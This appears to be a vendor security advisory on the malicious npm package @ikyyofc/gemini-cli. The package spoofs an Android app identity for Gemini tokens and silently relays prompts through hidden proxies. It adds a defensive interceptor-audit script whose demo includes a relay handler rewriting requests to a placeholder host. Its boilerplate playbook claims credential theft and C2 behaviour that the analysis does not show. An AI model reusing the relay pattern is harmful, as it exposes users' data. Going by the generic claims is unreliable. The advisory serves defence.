@ikyyofc/gemini-cli · npm
Malicious code in @ikyyofc/gemini-cli (npm). Remove it immediately and rotate any exposed credentials.
What this malware does
@ikyyofc/[email protected] ships two heavily obfuscated modules (src/gemini.js and src/utils/proxy.js) wrapped in an obfuscator.io-style string-array + RC4-XOR decoder (220-entry encrypted string array, hex-mangled identifiers like _0x4693ef, _0x29cf). Decoding reveals two coordinated behaviors that make this package unsafe for installers to use:
- Spoofed Google/Firebase Android-app identity for Gemini access. src/gemini.js exposes a getToken() that POSTs to a hidden URL with hardcoded X-Android-Package, X-Android-Cert (SHA1 cert fingerprint), and X-Firebase-GMPID headers plus a hardcoded clientType, then attaches the returned Bearer token to Gemini API calls. The CLI never asks the user for a Google API key; instead it ships a third-party Android application's identity to mint Gemini tokens on the installer's behalf. Every installer who uses the CLI is making Google Gemini API calls under a stolen client identity, exposing them to abuse-of-service and ToS-violation consequences if Google revokes or flags that identity.
- Silent relay through a hardcoded pool of ~13 third-party proxies. index.js calls setupGlobalProxy() at startup, which installs a global axios request interceptor in src/utils/proxy.js that rewrites every outgoing request URL via wrapUrl(proxy, originalUrl) to traverse one of ~13 hardcoded proxy hosts. The user's chat prompts and attached file contents (up to 20 MB) are carried in the Gemini POST body and are therefore visible in cleartext to the proxy operators. The README does not disclose any proxy/relay behavior; the proxy list is encrypted within the obfuscated bundle to prevent users from discovering it through source review.
The combination — obfuscation that hides the data flow, spoofed third-party credentials carrying the installer's API requests, and an undisclosed third-party relay reading prompt content and the Bearer token — is a silent-relay supply-chain pattern. Any developer who installs and runs this CLI leaks the contents of their conversations and any file they attach to operators they never consented to trust, while also operating under a credential that does not belong to them.
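The relay mechanism described above, as an added example that is not code from the package or from this advisory: a runtime check that pushes a canary request config through every registered axios request interceptor and reports any handler that moves the request to a different origin. It assumes the axios InterceptorManager shape (a handlers array of { fulfilled, rejected } entries, which is what axios.interceptors.request exposes in a running process); the relay host and the two sample interceptors are constructed for the demonstration.

```javascript
// Audit an axios-style request-interceptor chain for silent URL rewriting.
// Assumes axios' InterceptorManager shape: `handlers` is an array of
// { fulfilled, rejected } entries (pass `axios.interceptors.request`).
async function auditRequestInterceptors(interceptors, canaryUrl) {
  const findings = [];
  let config = { url: canaryUrl, headers: {} };
  for (const [index, handler] of interceptors.handlers.entries()) {
    // Ejected interceptors leave a null slot behind; skip them.
    if (!handler || typeof handler.fulfilled !== 'function') continue;
    const before = config.url;
    config = await handler.fulfilled(config); // handlers may be async
    const from = new URL(before, config.baseURL);
    const to = new URL(config.url, config.baseURL);
    if (to.origin !== from.origin) {
      findings.push({
        index,
        from: before,
        to: config.url,
        // A wrapUrl()-style relay keeps the real destination inside the
        // new URL so the proxy can forward the request onward.
        carriesOriginal: config.url.includes(encodeURIComponent(before)),
        // First line of the handler source helps locate the installing module.
        source: handler.fulfilled.toString().split('\n')[0].slice(0, 80),
      });
    }
  }
  return findings;
}

// Constructed stand-in for axios.interceptors.request: one benign handler
// that adds a header, and one relay handler of the kind the advisory
// describes. RELAY_HOST is a placeholder, not an indicator from the advisory.
const RELAY_HOST = 'https://relay.invalid';
const sampleInterceptors = {
  handlers: [
    { fulfilled: (cfg) => ({ ...cfg, headers: { ...cfg.headers, 'X-Trace': '1' } }) },
    { fulfilled: async (cfg) => ({ ...cfg, url: `${RELAY_HOST}/?u=${encodeURIComponent(cfg.url)}` }) },
  ],
};

auditRequestInterceptors(sampleInterceptors, 'https://api.example/v1/models').then((findings) => {
  for (const f of findings) {
    console.log(`request interceptor #${f.index} rewrote ${f.from} -> ${f.to}`);
  }
});
```

In a live process the same call against the real axios instance flags the handler registered by setupGlobalProxy(), and the source field points at the module that installed it.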
Malicious versions
Indicators of compromise (SHA-256)
Detection & response playbook
Credential / info stealer
Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @ikyyofc/gemini-cli (17 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @ikyyofc/gemini-cli across your stack and pipelines.
If you installed it — respond
@ikyyofc/gemini-cli is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If @ikyyofc/gemini-cli was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks @ikyyofc/gemini-cli before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
Frequently asked questions
Campaign
References
Credits
- Amazon Inspector · finder
Detect & block this
O3 blocks @ikyyofc/gemini-cli-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.